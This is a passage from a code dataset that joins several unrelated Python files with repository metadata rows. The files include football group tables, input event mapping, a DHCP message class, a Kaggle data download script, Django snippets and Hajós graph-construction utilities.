self.update_group_match(group, home_team, away_team, home_score, away_score)
else:
if result == 'W':
self.records['W'+game] = home_team
self.records['L'+game] = away_team
elif result == 'L':
self.records['L'+game] = home_team
self.records['W'+game] = away_team
def get_reference(self, key):
if key[:1] not in ['W', 'L']:
return self.references[key]
else:
return self.records[key]
def update_group_match(self, group, home_team, away_team, home_score, away_score):
group = group.split(' ')[1]
table = self.tables[group]
home_score = int(home_score)
away_score = int(away_score)
home_points = 0
away_points = 0
if home_score > away_score:
home_points = 3
away_points = 0
elif away_score > home_score:
home_points = 0
away_points = 3
else:
home_points = 1
away_points = 1
d = {
home_team: [home_score, away_score, home_points],
away_team: [away_score, home_score, away_points]
}
# Check if teams are present
for i in [home_team, away_team]:
if i not in table:
table[i] = [0, 0, 0, 0, 0, 0]
table[i][0] += 1
table[i][1] += d[i][0]
table[i][2] += d[i][1]
table[i][3] += d[i][0] - d[i][1]
table[i][4] += d[i][2]
self.tables[group] = table
self.check_finished()
def check_finished(self):
for i in self.tables:
table = self.tables[i]
for j in table:
team = table[j]
if team[0] != 3:
return
self.groups_finished = True
for i in self.tables:
table = self.tables[i]
print(table)
table = self.sort_group(table)
keys = list(table)
one = ''
two = ''
for item in table:
team = table[item]
if team[5] == 1:
one = item
elif team[5] == 2:
two = item
self.references['1'+ i] = one
self.references['2'+ i] = two
from pprint import pprint
pprint(self.tables)
pprint(self.references)
def sort_group(self, table):
sorted = 1
keys = list(table)
print(table)
for i in range(len(table)):
highest = None
highest_index = None
for j in range(len(table)):
current = table[keys[j]]
print(current)
if current[5] != 0:
continue
if highest_index == None and highest == None:
highest_index = j
highest = current
if current[4] > highest[4] :
current = highest
highest_index = j
elif current[4] == highest[4]:
if current[3] > highest[3]:
current = highest
highest_index = j
elif current[3] == highest[3]:
if current[1] > highest[1]:
current = highest
highest_index = j
print (keys[highest_index])
table[keys[highest_index]][5] = sorted
sorted += 1
return table
def get_form(self, country, date):
from parsers.match_parser import get_form
return get_form(country, date, self.r)
def get_h2h(self, country1, country2, date):
from parsers.match_parser import get_h2h
return get_h2h(country1, country2, date, self.r)
| 22.060976 | 97 | 0.622443 |
3a9e23b66225e7784226027da5b0c2acadfbb17f | 4,905 | py | Python | rurina5/input/map.py | TeaCondemns/rurina | 43725ebea5872953125271a9abb300a4e3a80a64 | [
"MIT"
] | null | null | null | rurina5/input/map.py | TeaCondemns/rurina | 43725ebea5872953125271a9abb300a4e3a80a64 | [
"MIT"
] | null | null | null | rurina5/input/map.py | TeaCondemns/rurina | 43725ebea5872953125271a9abb300a4e3a80a64 | [
"MIT"
] | null | null | null | from typing import Union, Sequence
import event
_actions = {}
"""_actions = {
'action_name': {
'event1event2':
{
'event1': ...,
'event2': ...
}
}
}"""
def addaction(name: str):
if name not in _actions:
_actions[name] = {}
def removeaction(name: str):
if name in _actions:
del _actions[name]
def haveaction(name: str) -> bool:
return name in _actions
def _action_status(name: str, index: int) -> bool:
if name not in _actions:
return False
returned_bool = False
for hashable_event_fullname in _actions[name]:
event_fullname = list(_actions[name][hashable_event_fullname].keys())
returned_bool = returned_bool or _eventstatus(name, event_fullname, index)
if returned_bool:
return True
return returned_bool
def actionstatus(name: str) -> bool:
return _action_status(name, 1)
def last_actionstatus(name: str) -> bool:
return _action_status(name, 2)
def _event(event_fullname: Union[Sequence[str], str]):
if isinstance(event_fullname, str):
event_fullname = [event_fullname]
return event_fullname, ''.join(event_fullname)
def setevent(
action_name: str,
event_fullname: Union[Sequence[str], str],
inverse_event_fullname: Union[Sequence[str], str] = None
):
addaction(action_name)
event_fullname, hashable_event_fullname = _event(event_fullname)
if inverse_event_fullname is None or isinstance(inverse_event_fullname, str):
inverse_event_fullname = [inverse_event_fullname] * len(event_fullname)
if hashable_event_fullname not in _actions[action_name]:
_actions[action_name][hashable_event_fullname] = {}
for i in range(len(event_fullname)):
_actions[action_name][hashable_event_fullname][event_fullname[i]] = [inverse_event_fullname[i], False, False]
def remove_event(action_name: str, event_fullname: Union[Sequence[str], str]):
event_fullname, hashable_event_fullname = _event(event_fullname)
for _event_fullname in event_fullname:
if have_event(action_name, _event_fullname):
del _actions[action_name][hashable_event_fullname][_event_fullname]
def have_event(action_name: str, event_fullname: Union[Sequence[str], str]) -> bool:
event_fullname, hashable_event_fullname = _event(event_fullname)
returned_bool = True
for _event_fullname in event_fullname:
returned_bool = returned_bool \
and action_name in _actions \
and hashable_event_fullname in _actions[action_name] \
and _event_fullname in _actions[action_name][hashable_event_fullname]
if not returned_bool:
return False
return returned_bool
def _eventstatus(action_name: str, event_fullname: Union[Sequence[str], str], index: int) -> bool:
event_fullname, hashable_event_fullname = _event(event_fullname)
returned_bool = True
for _event_fullname in event_fullname:
returned_bool = returned_bool \
and have_event(action_name, event_fullname) \
and _actions[action_name][hashable_event_fullname][_event_fullname][index]
if not returned_bool:
return False
return returned_bool
def eventstatus(action_name: str, event_fullname: Union[Sequence[str], str]) -> bool:
return _eventstatus(action_name, event_fullname, 1)
def last_eventstatus(action_name: str, event_fullname: Union[Sequence[str], str]) -> bool:
return _eventstatus(action_name, event_fullname, 2)
def flip():
event_buffer = event.get(False)
for action_name in _actions:
for event_fullname in _actions[action_name]:
hashable_event_fullname = ''.join(event_fullname)
for _event_fullname in _actions[action_name][hashable_event_fullname]:
action_event = _actions[action_name][hashable_event_fullname][_event_fullname]
action_event[2] = action_event[1]
if action_event[0] is None:
action_event[1] = False
for e in event_buffer:
fullname = event.fullname(e)
if action_event[0] is None and (_event_fullname + ' ') in fullname:
action_event[1] = True
elif action_event[0] is not None:
if (_event_fullname + ' ') in fullname:
action_event[1] = True
elif (action_event[0] + ' ') in fullname:
action_event[1] = False
__all__ = (
'addaction',
'removeaction',
'haveaction',
'actionstatus',
'last_actionstatus',
'setevent',
'remove_event',
'have_event',
'eventstatus',
'last_eventstatus',
'flip',
)
| 29.196429 | 117 | 0.648114 |
3a9f119bf4f058c5f85a03cbf6f4da2b349b8dd5 | 1,604 | py | Python | data/ABC/filter_out_tiny_models.py | YoungXIAO13/6DPoseEstimationDatasets | b9cb1d9842870860a15bf3cf600cdfb68d1e195e | [
"MIT"
] | 383 | 2019-09-03T15:29:22.000Z | 2022-03-28T02:01:15.000Z | data/ABC/filter_out_tiny_models.py | Fang-Haoshu/ObjectPoseEstimationSummary | 2a11797e6b01e1820105740fcaeb7c049094c57f | [
"MIT"
] | 5 | 2019-10-18T13:04:07.000Z | 2021-09-29T05:26:52.000Z | data/ABC/filter_out_tiny_models.py | Fang-Haoshu/ObjectPoseEstimationSummary | 2a11797e6b01e1820105740fcaeb7c049094c57f | [
"MIT"
] | 63 | 2019-09-17T12:13:51.000Z | 2022-03-28T03:06:05.000Z | import os
from os.path import join, getsize
from PIL import Image
from tqdm import tqdm
import numpy as np
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--dataset_dir', type=str, help='dataset directory')
parser.add_argument('--model', type=str, default='abc_0000', help='subdirectory containing obj files')
parser.add_argument('--views', type=str, default='multiviews', help='subdirectory containing multiviews')
args = parser.parse_args()
obj_dir = join(args.dataset_dir, args.model)
view_dir = join(args.dataset_dir, args.views)
model_names = sorted(os.listdir(view_dir))
csv_file = join(args.dataset_dir, '{}.txt'.format(args.model))
with open(csv_file, 'w') as f:
f.write('model_name,size,ratio_min,ratio_max,occupy_min,occupy_max\n')
for model_name in tqdm(model_names):
size = int(getsize(join(obj_dir, '{}.obj'.format(model_name))) / (2 ** 20))
img_dir = join(view_dir, model_name, 'nocs')
images = os.listdir(img_dir)
ratio = []
occupy = []
for img in images:
try:
rgb = Image.open(join(img_dir, img))
w, h = rgb.size
left, upper, right, lower = rgb.getbbox()
ratio.append((lower - upper) / (right - left))
occupy.append(np.sum(np.array(rgb.convert('L')) != 0) / (w * h))
except TypeError:
ratio.append(0)
occupy.append(0)
with open(csv_file, 'a') as f:
f.write(model_name + ',' + str(size) + ',' + str(np.min(ratio)) + ',' + str(np.max(ratio)) + ',' +
str(np.min(occupy)) + ',' + str(np.max(occupy)) + '\n')
| 39.121951 | 106 | 0.639027 |
3aa041de8b903df622c3ee51ddf1f6842ee18d8c | 59 | py | Python | perception/navigator_vision/navigator_vision/__init__.py | czk100/NaviGator | c078c68768c1df4ad48c4c9a60a8c0bf4bdab63a | [
"MIT"
] | null | null | null | perception/navigator_vision/navigator_vision/__init__.py | czk100/NaviGator | c078c68768c1df4ad48c4c9a60a8c0bf4bdab63a | [
"MIT"
] | null | null | null | perception/navigator_vision/navigator_vision/__init__.py | czk100/NaviGator | c078c68768c1df4ad48c4c9a60a8c0bf4bdab63a | [
"MIT"
] | null | null | null | from scan_the_code_classifier import ScanTheCodeClassifier
| 29.5 | 58 | 0.932203 |
3aa10622900b7fd3873b3fb7ab47170cdb7c2440 | 2,959 | py | Python | assignments/06-python-first-lines/first_lines.py | patarajarina/biosys-analytics | a5e8845211797364ec6f7f8679911ed3b5312887 | [
"MIT"
] | null | null | null | assignments/06-python-first-lines/first_lines.py | patarajarina/biosys-analytics | a5e8845211797364ec6f7f8679911ed3b5312887 | [
"MIT"
] | null | null | null | assignments/06-python-first-lines/first_lines.py | patarajarina/biosys-analytics | a5e8845211797364ec6f7f8679911ed3b5312887 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""
Author : patarajarina
Date : 2019-02-25
Purpose: Rock the Casbah
"""
import argparse
import sys
import os
# --------------------------------------------------
def get_args():
"""get command-line arguments"""
parser = argparse.ArgumentParser(
description='Argparse Python script',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'positional', metavar='DIR', help='A positional argument', nargs='+')
# parser.add_argument(
# 'DIR',
# '--',
# help='A named string argument',
# metavar='DIR',
# type=dir,
# default=None,
# nargs='+',
# default='')
parser.add_argument(
'-w',
'--width',
help='A named integer argument',
metavar='int',
type=int,
default=50)
# parser.add_argument(
# '-f', '--flag', help='A boolean flag', action='store_true')
return parser.parse_args()
# --------------------------------------------------
def warn(msg):
"""Print a message to STDERR"""
print(msg, file=sys.stderr)
# --------------------------------------------------
def die(msg='Something bad happened'):
"""warn() and exit with error"""
warn(msg)
sys.exit(1)
# --------------------------------------------------
def main():
"""Make a jazz noise here"""
args = get_args()
# args = sys.argv[1:]
# str_arg = args.arg
DIRS = args.positional
# flag_arg = args.flag
width = args.width
# if not os.path.isdir(DIRS):
# print('"{}" is not a directory'.format(dirname), file=sys.stderr)
# print(DIRS)
# dirname = args[0] #check
for dirname in DIRS:
if not dirname[-1:] == '/':
dirname = dirname + '/'
if not os.path.isdir(dirname):
if dirname[-1:] == '/':
dirname = dirname[:-1]
print('"{}" is not a directory'.format(dirname), file=sys.stderr)
else:
#if len(DIRS)>1:
print(dirname[:-1])
# for tup in dirname.items():
# print(tup)
out = {}
for eachfile in os.listdir(dirname):
#print(eachfile)
f = open(dirname + eachfile, "r")
firstline = f.readline()
firstline=firstline.strip()
out[firstline]=eachfile
#print(out)
for keyline, valfile in sorted(out.items()):
leftlen = width - len(keyline) - len(valfile)
dots ='.'
for i in range(1,leftlen):
dots = dots+'.'
#print(len(dots+keyline+valfile))
print('{} {} {}'.format(keyline, dots,valfile))
# --------------------------------------------------
if __name__ == '__main__':
main()
| 26.9 | 82 | 0.460967 |
3aa3c3abf98c6d1ad3b59e984112889aa463ffaf | 4,251 | py | Python | inocybe_dhcp/rfc2131.py | kot-begemot-uk/opx-dhcp | 683c7c52f19eedc57196403213c9695ac3439526 | [
"Apache-2.0"
] | null | null | null | inocybe_dhcp/rfc2131.py | kot-begemot-uk/opx-dhcp | 683c7c52f19eedc57196403213c9695ac3439526 | [
"Apache-2.0"
] | null | null | null | inocybe_dhcp/rfc2131.py | kot-begemot-uk/opx-dhcp | 683c7c52f19eedc57196403213c9695ac3439526 | [
"Apache-2.0"
] | 2 | 2018-09-05T07:59:21.000Z | 2018-09-14T07:15:17.000Z | #!/usr/bin/env python3
'''RFC 2131 DHCP message structures.'''
# Copyright (c) 2018 Inocybe Technologies.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED ON AN *AS IS* BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT
# LIMITATION ANY IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS
# FOR A PARTICULAR PURPOSE, MERCHANTABLITY OR NON-INFRINGEMENT.
#
# See the Apache Version 2.0 License for specific language governing
# permissions and limitations under the License.
from six import add_metaclass
from .types import (
StructuredValue,
UInt8, UInt16, UInt32, IPv4,
HexString, NulTerminatedString,
)
from .rfc2132 import Cookie, Options
from .options import Supported
@add_metaclass(StructuredValue)
class Message(object):
'''A class representing a RFC 2131 DHCP message.
Each instance is a :class:`dict` instance restricted to the pairs specified in :attr:`spec`:
attempting to set a pair at a key not in :attr:`spec` is rejected with :class:`KeyError`;
attempting to set a pair with a value which is not supported by that pair's value type is
rejected with :class:`ValueError` or :class:`TypeError`.
An instance of this class may be created as per :class:`dict`, or by calling classmethod
:meth:`unpack` with a binary string, encoded as per RFC 2131. To serialise an instance to a
binary string, call :meth:`pack`.
If a new value is set at 'hlen' or 'chaddr' then call :meth:`truncate_chaddr` to ensure that
the encoded value of 'chaddr' does not exceed 'hlen' octets.
'''
name = 'RFC 2131 DHCP message'
### :attr:`spec` is a sequence of (key, value type) pairs
spec = (
('op', UInt8(1, 2)),
('htype', UInt8()),
('hlen', UInt8(1, 16)),
('hops', UInt8()),
('xid', UInt32()),
('secs', UInt16()),
('flags', UInt16()),
('ciaddr', IPv4()),
('yiaddr', IPv4()),
('siaddr', IPv4()),
('giaddr', IPv4()),
('chaddr', HexString(16)),
('sname', NulTerminatedString(64)),
('file', NulTerminatedString(128)),
('cookie', Cookie()),
('options', Options()),
)
def __init__(self):
self.truncate_chaddr()
def truncate_chaddr(self):
'''If this instance's 'chaddr' is too long to be encoded in 'hlen' octets then truncate the
value of 'chaddr' so that it can be encoded in 'hlen' octets. If this instance does not
have a value for 'chaddr' or 'hlen' then do nothing.
'''
### pylint: disable=unsubscriptable-object
try:
self['chaddr'] = self.fields['chaddr'].truncate(self['chaddr'], self['hlen']) ### pylint: disable=no-member
except KeyError:
pass
def decode_options(self, supported=None):
'''Return a plain :class:`dict` copy of `self`, with 'options' decoded using `supported`. If
`supported` is None, then decode options as TLV.
'''
if supported is None:
### use an empty set of supported options to decode as TLV
supported = Supported()
copy = dict(self)
copy['options'] = supported.decode(self['options']) ### pylint: disable=unsubscriptable-object
return copy
def encode_options(self, options, supported=None, append=False):
'''Set this instance's 'options' from `options` encoded using `supported`. If `supported` is
None, then encode options from TLV. If `append` is True, then append encoded `options` to
the existing 'options' rather than replacing them.
'''
if supported is None:
### use an empty set of supported options to encode from TLV
supported = Supported()
encoded = tuple(supported.encode(options))
if append:
self['options'] += encoded ### pylint: disable=unsubscriptable-object
else:
self['options'] = encoded ### pylint: disable=unsubscriptable-object
| 42.51 | 119 | 0.639379 |
3aa5d9d21b6bad4cb5b8740e530181d78e841342 | 1,883 | py | Python | src/data/get_raw_data.py | vivek1739/titanic | 39058f7ecef3ae0e1962fc1dfc550b654e97e1f0 | [
"MIT"
] | null | null | null | src/data/get_raw_data.py | vivek1739/titanic | 39058f7ecef3ae0e1962fc1dfc550b654e97e1f0 | [
"MIT"
] | null | null | null | src/data/get_raw_data.py | vivek1739/titanic | 39058f7ecef3ae0e1962fc1dfc550b654e97e1f0 | [
"MIT"
] | null | null | null | # encoding utf-8
import os
from dotenv import find_dotenv,load_dotenv
from requests import session
import logging
#payload for login to kaggle
payload = {
'action':'login',
'username': os.environ.get("KAGGLE_USERNAME"),
'password': os.environ.get("KAGGLE_PASSWORD")
}
def extract_data(url, file_path):
'''method to extract data'''
with session() as c:
c.post('https://www.kaggle.com/account/login',data=payload)
with open(file_path,'wb') as handle:
response = c.get(url, stream=True)
for block in response.iter_content(1024):
handle.write(block)
def main(project_dir):
''' main method '''
#get logger
logger = logging.getLogger(__name__)
logger.info('getting raw data')
logger.info(project_dir)
#urls
# urls
train_url = 'https://www.kaggle.com/c/3136/download/train.csv'
test_url = 'https://www.kaggle.com/c/3136/download/test.csv'
# raw sub folder inside data folder
raw_data_path = os.path.join(os.path.curdir,'data','raw')
train_data_path = os.path.join(raw_data_path,'train.csv')
test_data_path = os.path.join(raw_data_path,'test.csv')
# extract data
extract_data(train_url,train_data_path)
extract_data(test_url,test_data_path)
logger.info('downloaded raw training and test data')
if __name__ =='__main__':
#getting the root directory
project_dir = os.path.join(os.path.dirname(__file__),os.pardir,os.pardir)
print('project dir : '+project_dir)
# setup logger
log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO,format=log_fmt)
# find .env automatically by walking up the directories until its found
dotenv_path = find_dotenv()
load_dotenv(dotenv_path)
# call the main
main(project_dir) | 30.868852 | 77 | 0.668083 |
3aa64d8b8830c4c3c052d815f3baf34b10969969 | 168 | py | Python | core/admin.py | yasminfarza/country-state-address-api | 39c8d349095dcca4f2411f7097497d6a8f39c1e1 | [
"MIT"
] | 4 | 2021-06-06T14:16:33.000Z | 2021-06-09T03:42:11.000Z | core/admin.py | yasminfarza/country-state-address-api | 39c8d349095dcca4f2411f7097497d6a8f39c1e1 | [
"MIT"
] | null | null | null | core/admin.py | yasminfarza/country-state-address-api | 39c8d349095dcca4f2411f7097497d6a8f39c1e1 | [
"MIT"
] | null | null | null | from django.contrib import admin
from core.models import Country, State, Address
admin.site.register(Country)
admin.site.register(State)
admin.site.register(Address)
| 21 | 47 | 0.815476 |
3aa8e8a10f90ca6b21d728f7a1f51b3d5e590506 | 770 | py | Python | apps/splash/migrations/0006_auto_20151213_0309.py | Kpaubert/onlineweb4 | 9ac79f163bc3a816db57ffa8477ea88770d97807 | [
"MIT"
] | 32 | 2017-02-22T13:38:38.000Z | 2022-03-31T23:29:54.000Z | apps/splash/migrations/0006_auto_20151213_0309.py | Kpaubert/onlineweb4 | 9ac79f163bc3a816db57ffa8477ea88770d97807 | [
"MIT"
] | 694 | 2017-02-15T23:09:52.000Z | 2022-03-31T23:16:07.000Z | apps/splash/migrations/0006_auto_20151213_0309.py | Kpaubert/onlineweb4 | 9ac79f163bc3a816db57ffa8477ea88770d97807 | [
"MIT"
] | 35 | 2017-09-02T21:13:09.000Z | 2022-02-21T11:30:30.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import django_extensions.db.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("splash", "0005_auto_20150422_2236")]
operations = [
migrations.AlterField(
model_name="splashevent",
name="created",
field=django_extensions.db.fields.CreationDateTimeField(
auto_now_add=True, verbose_name="created"
),
),
migrations.AlterField(
model_name="splashevent",
name="modified",
field=django_extensions.db.fields.ModificationDateTimeField(
auto_now=True, verbose_name="modified"
),
),
]
| 27.5 | 72 | 0.614286 |
3aaa3f49b8735100881fb406c235065fe7efe4e9 | 314 | py | Python | Ekeopara_Praise/Phase 1/Python Basic 1/Day 3 Tasks/Task 10.py | nkem1010/python-challenge-solutions | 203cedc691094a83b110fc75764aac51dbbc1a03 | [
"MIT"
] | null | null | null | Ekeopara_Praise/Phase 1/Python Basic 1/Day 3 Tasks/Task 10.py | nkem1010/python-challenge-solutions | 203cedc691094a83b110fc75764aac51dbbc1a03 | [
"MIT"
] | null | null | null | Ekeopara_Praise/Phase 1/Python Basic 1/Day 3 Tasks/Task 10.py | nkem1010/python-challenge-solutions | 203cedc691094a83b110fc75764aac51dbbc1a03 | [
"MIT"
] | null | null | null | '''10. Write a Python program to get a string which is n (non-negative integer) copies of a given string.
Tools: input function, slicing'''
word = str(input("Type in any string or word: "))
n = int(input("Enter the number of repititions: "))
ans = ""
for i in range(n):
ans = ans + word
print(ans)
| 24.153846 | 105 | 0.656051 |
3aab0f40c2920df9397a92bef8cc72257b4908bd | 19,245 | py | Python | hajosUtil.py | eej/hajos-search | 9a8e80b3002e814475c61e8d6aa7e5b860c04e83 | [
"FSFAP"
] | 1 | 2021-04-10T21:29:39.000Z | 2021-04-10T21:29:39.000Z | hajosUtil.py | eej/hajos-search | 9a8e80b3002e814475c61e8d6aa7e5b860c04e83 | [
"FSFAP"
] | null | null | null | hajosUtil.py | eej/hajos-search | 9a8e80b3002e814475c61e8d6aa7e5b860c04e83 | [
"FSFAP"
] | null | null | null | #!/usr/bin/env python
"""
Hajos utilities.
"""
from util import *
# Hajos Sum
def hajosSum(G1, G2, x1, y1, x2, y2):
G = []
for i in range(len(G1)):
G.append(G1[i][:])
G[i].extend([0 for x in range(len(G2)-1)])
for i in range(len(G2)-1):
G.append([0 for x in range(len(G1) + len(G2) - 1)])
indexMap = []
for i in range(len(G2)):
if i < x2:
indexMap.append(len(G1)+i)
elif i == x2:
indexMap.append(x1)
elif i > x2:
indexMap.append(len(G1)+i-1)
for i in range(len(G2)):
for j in range(len(G2)):
if i != j:
if G2[i][j] == 1:
G[indexMap[i]][indexMap[j]] = 1
G[indexMap[j]][indexMap[i]] = 1
G[x1][y1] = 0
G[y1][x1] = 0
G[indexMap[x2]][indexMap[y2]] = 0
G[indexMap[y2]][indexMap[x2]] = 0
G[y1][indexMap[y2]] = 1
G[indexMap[y2]][y1] = 1
return G
# identify vertex
def identify(G, pair):
newG = []
for col in G:
newG.append(col[:])
for i in range(len(G)):
if i != pair[0]:
if G[i][pair[1]] == 1:
#print pair, i
newG[i][pair[0]] = 1
newG[pair[0]][i] = 1
newG[pair[1]][i] = -1
newG[i][pair[1]] = -1
#print "---------------------"
#print pair
#printGraph(G)
#print ""
#printGraph(newG)
#print "---------------------"
newG = newG[:pair[1]] + newG[pair[1]+1:]
for i in range(len(newG)):
newG[i] = newG[i][:pair[1]] + newG[i][pair[1]+1:]
#if not isSymetric(newG):
# print "screwed up while trying to merge", pair
# print "\n".join(map(str,G))
# print "###############################################"
# print "\n".join(map(str,newG))
return newG
def mergeSubgraphs(t, sub1, sub2):
# uhhhmmm hajos sum on lists? Or something like that.
#print t
#print sub1
#print sub2
new1 = set()
for e in sub1:
new1.add(sortPair(e))
if sortPair((t[0],t[2])) in new1:
new1.remove(sortPair((t[0],t[2])))
new2 = set()
for e in sub2:
new2.add(sortPair(e))
if sortPair((t[1],t[2])) in new2:
new2.remove(sortPair((t[1],t[2])))
ret = new1.union(new2)
ret.add(sortPair((t[0], t[1])))
#print "ret:", ret
return ret
def takeSubgraph(G, edges):
# given a graph and edge list, return the subgraph consisting of the listed edges,
# and a mapping between the vextex indicies.
vertexSet = set()
for e in edges:
vertexSet.add(e[0])
vertexSet.add(e[1])
vertexList = sorted(list(vertexSet))
#m = [-1 for v in vertexList]
m = {}
for i in xrange(len(vertexList)):
m[vertexList[i]] = i
N = newGraph(len(vertexList))
for e in edges:
N[m[e[0]]][m[e[1]]] = 1
N[m[e[1]]][m[e[0]]] = 1
return N, vertexList
def edgesToVerts(s):
""" Turn a list of edges into a list of verticies """
o = set()
for e in s:
o.add(e[0])
o.add(e[1])
return o
def getAllTripples(G):
triList = []
for i in xrange(len(G)-1):
for j in xrange(i+1,len(G)):
if G[i][j]:
for k in xrange(len(G)):
if k != i and k != j and (not G[i][k]) and (not G[j][k]):
triList.append((i,j,k))
return triList
def getTripplesOnEdge(G,e):
triList = []
for i in xrange(len(G)):
if (i not in e) and (not G[i][e[0]]) and (not G[i][e[1]]):
triList.append((e[0],e[1],i))
return triList
# Return a list of edges that would turn kites into 4-cliques if added.
def getKiteEdges(G):
L = set()
for i in xrange(len(G)-2):
for j in xrange(i+1,len(G)-1):
if G[i][j] == 1:
for k in xrange(j+1,len(G)):
#print i,j,k
if G[i][k]==1 and G[j][k]==1:
#print i, j, k, "found"
# We have a triangle.
#for l in range(k+1, len(G)):
for l in xrange(i+1,len(G)):
if l != k and G[l][i]==1 and G[l][j]==1:
#if G[l][i]==1 and G[l][j]==1:
#print "add", (l,k)
L.add(sortPair((l, k)))
if l != j and G[l][i]==1 and G[l][k]==1:
#if G[l][i]==1 and G[l][k]==1:
#print "add", (l,j)
L.add(sortPair((l, j)))
if l != i and G[l][k]==1 and G[l][j]==1:
#if G[l][k]==1 and G[l][j]==1:
#print "add", (l,i)
L.add(sortPair((l, i)))
return L
# returns a set of edges forming a double kite or 5 wheel from a defining tripple
def getEdgesFromKite(G,tri):
L = set([sortPair([tri[1], tri[2]])])
for v in (tri[1], tri[2]):
done = False
for i in xrange(len(G)):
if i in tri:
continue
if G[i][tri[0]] and G[i][v]:
for j in xrange(len(G)):
if j in (i,) + tri:
continue
if G[i][j] and G[j][tri[0]] and G[j][v]:
L.add(sortPair((v,i)))
L.add(sortPair((v,j)))
L.add(sortPair((i,j)))
L.add(sortPair((i,tri[0])))
L.add(sortPair((j,tri[0])))
done = True
break
if done:
break
if len(L) not in (10, 11):
print
print L
print tri
#import util
#util.displayGraph(G)
print "Oops"
print "Cliqie:", hasClique(G)
exit()
return L
# returns a set of edges from a clique
def getEdgesFromClique(G,C):
L = [ [C[0],C[1]],
[C[0],C[2]],
[C[0],C[3]],
[C[1],C[2]],
[C[1],C[3]],
[C[2],C[3]]]
return set([sortPair(x) for x in L])
# returns a set of edges from a clique
def getEdgesFromKClique(E):
C = list(E)
L = set()
for i in range(len(C)-1):
for j in range(i+1, len(C)):
L.add( (C[i], C[j]) )
return set([sortPair(x) for x in L])
# Get the list of missing edges that could form 4-cliques, and see if any of them pair for an add edge rule.
# (returns true if there is a five wheel or double kite subgraph, kite edge list otherwise)
def leafCheckBase(G):
#print "clique: ", hasClique(G)
edgeList = tuple(getKiteEdges(G))
#print edgeList
#t = '5'
for i in xrange(len(edgeList)-1):
for j in xrange(i+1, len(edgeList)):
if edgeList[i][0] == edgeList[j][0] and G[edgeList[i][1]][edgeList[j][1]] == 1:
#print edgeList[i][0], edgeList[i][1], edgeList[j][1]
#if len(getEdgesFromKite(G, (edgeList[i][0], edgeList[i][1], edgeList[j][1]))) == 11:
# t = 'h'
return True, (edgeList[i][0], edgeList[i][1], edgeList[j][1])
if edgeList[i][0] == edgeList[j][1] and G[edgeList[i][1]][edgeList[j][0]] == 1:
#print edgeList[i][0], edgeList[i][1], edgeList[j][0]
#if len(getEdgesFromKite(G, (edgeList[i][0], edgeList[i][1], edgeList[j][0]))) == 11:
# t = 'h'
return True, (edgeList[i][0], edgeList[i][1], edgeList[j][0])
if edgeList[i][1] == edgeList[j][0] and G[edgeList[i][0]][edgeList[j][1]] == 1:
#print edgeList[i][1], edgeList[i][0], edgeList[j][1]
#if len(getEdgesFromKite(G, (edgeList[i][1], edgeList[i][0], edgeList[j][1]))) == 11:
# t = 'h'
return True, (edgeList[i][1], edgeList[i][0], edgeList[j][1])
if edgeList[i][1] == edgeList[j][1] and G[edgeList[i][0]][edgeList[j][0]] == 1:
#print edgeList[i][1], edgeList[i][0], edgeList[j][0]
#if len(getEdgesFromKite(G, (edgeList[i][1], edgeList[i][0], edgeList[j][0]))) == 11:
# t = 'h'
return True, (edgeList[i][1], edgeList[i][0], edgeList[j][0])
return False, edgeList
# Get the list of missing edges that could form 4-cliques, and see if any of them pair for an add edge rule.
# (returns true if there is a five wheel or double kite subgraph, kite edge list otherwise)
def isLeaf(G):
r = leafCheckBase(G)
if r[0]:
return True, getEdgesFromKite(G, r[1])
else:
return r
# Get the list of missing edges that could form 4-cliques, and see if any of them pair for an add edge rule.
# (returns true if there is a five wheel or double kite subgraph, kite edge list otherwise)
def isLeafAlt(G):
r = leafCheckBase(G)
if r[0]:
return r
else:
return False, False
def hasClique(G):
for i in xrange(len(G)-3):
for j in xrange(i+1,len(G)-2):
if G[i][j] == 1:
for k in xrange(j+1,len(G)-1):
if G[i][k]==1 and G[j][k]==1:
# We have a triangle.
for l in xrange(k+1, len(G)):
if G[l][i]==1 and G[l][j]==1 and G[l][k]==1:
#return [i, j, k, l]
return getEdgesFromClique(G,[i, j, k, l])
return False
global cliqueCache
cliqueCache = {}
def kCliqueRec(G,k,s):
#print "Enterting:", k, s
if (k, s) in cliqueCache:
#print "cache:", cliqueCache[(k,s)]
return cliqueCache[(k,s)]
if k == 0:
return s
for i in xrange(len(G)):
if i not in s:
con = True
for v in s:
if not G[i][v]:
con = False
break
if con:
r = kCliqueRec(G,k-1,s.union([i]))
if r:
cliqueCache[(k,s)] = r
#print "Returing", r, "on hit on ", i
return r
cliqueCache[(k,s)] = False
#print "Returing False"
return False
def hasKclique(G,k):
global cliqueCache
cliqueCache = {}
r = kCliqueRec(G,k,frozenset())
if r:
r = getEdgesFromKClique(r)
return r
def hasKcliqueOnEdge(G,k,e):
global cliqueCache
cliqueCache = {}
r = kCliqueRec(G,k-2,frozenset(e))
if r:
r = getEdgesFromKClique(r)
return r
def hasCliqueOnEdge(G,e):
for k in xrange(len(G)-1):
if k in e:
continue
if G[e[0]][k]==1 and G[e[1]][k]==1:
# We have a triangle.
for l in xrange(k+1, len(G)):
if l in e:
continue
if G[l][e[0]]==1 and G[l][e[1]]==1 and G[l][k]==1:
#return [e[0], e[1], k, l]
return getEdgesFromClique(G,[e[0],e[1], k, l])
return False
def getKiteEdgesOnEdge(G, e):
L = set()
for k in xrange(len(G)):
if G[e[0]][k]==1 and G[e[1]][k]==1:
for l in xrange(len(G)):
if l != k and G[l][e[0]]==1 and G[l][e[1]]==1:
L.add(sortPair((l, k)))
if l != e[1] and G[l][e[0]] == 1 and G[l][k] == 1:
L.add(sortPair((l, e[1])))
if l != e[0] and G[l][k]==1 and G[l][e[1]]==1:
L.add(sortPair((l, e[0])))
return L
# I don't know what this is
def getKiteEdgesEx(G, e):
L = []
for i in range(len(G)-2):
if i in e:
continue
